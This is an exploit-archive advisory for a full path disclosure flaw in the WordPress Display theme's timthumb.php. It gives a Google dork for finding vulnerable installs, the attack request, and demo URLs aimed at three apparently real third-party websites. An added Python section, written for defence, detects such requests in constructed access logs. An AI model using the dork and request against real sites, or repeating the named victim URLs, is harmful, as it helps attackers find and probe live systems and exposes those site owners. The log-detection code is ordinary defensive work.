# Exploit Title: WordPress Display theme Full Path Disclosure vulnerability
# Date: 13/01/2012
# Author: The Black Devils
# Category : [ webapps ]
# Type : php
# Tested on: [Windows] & [Ubuntu]
# Dork : allinurl:/wp-content/themes/display/
#------------------
http://localhost/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/
Demo:
http://resporton.com/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/
http://www.theartsgarage.com/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/
http://burstinwithbroadway.com/wordpress/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/
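
Detection side of the request pattern above, as an added example that is not part of the original advisory: it flags access-log requests to the theme's timthumb.php whose src parameter does not name an image file. The log lines, combined log format, status codes and function name are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jan/2012:10:01:02 +0000] "GET /wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/ HTTP/1.1" 400 512 "-" "Mozilla/5.0"
203.0.113.8 - - [13/Jan/2012:10:01:05 +0000] "GET /wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/2012/01/logo.png&w=200 HTTP/1.1" 200 8450 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Jan/2012:10:02:11 +0000] "GET /wordpress/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/ HTTP/1.1" 400 498 "-" "curl/7.21"
203.0.113.9 - - [13/Jan/2012:10:02:15 +0000] "GET /index.php HTTP/1.1" 200 10240 "-" "curl/7.21"
"""

# client, timestamp, request target and status from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|HEAD|POST) (\S+) [^"]*" (\d{3})')
# Path suffix taken from the advisory; matches installs in a subdirectory too
SCRIPT_SUFFIX = "/themes/display/framework/includes/timthumb.php"
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")


def suspicious_requests(log_text):
    """Return (client, timestamp, src, status) for timthumb.php requests
    whose src value does not end in an image extension."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, ts, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(SCRIPT_SUFFIX):
            continue
        # parse_qs URL-decodes values; a missing or empty src is flagged as well
        srcs = parse_qs(url.query, keep_blank_values=True).get("src", [""])
        for src in srcs:
            if not src.lower().endswith(IMAGE_EXTS):
                hits.append((client, ts, src, int(status)))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```
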
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.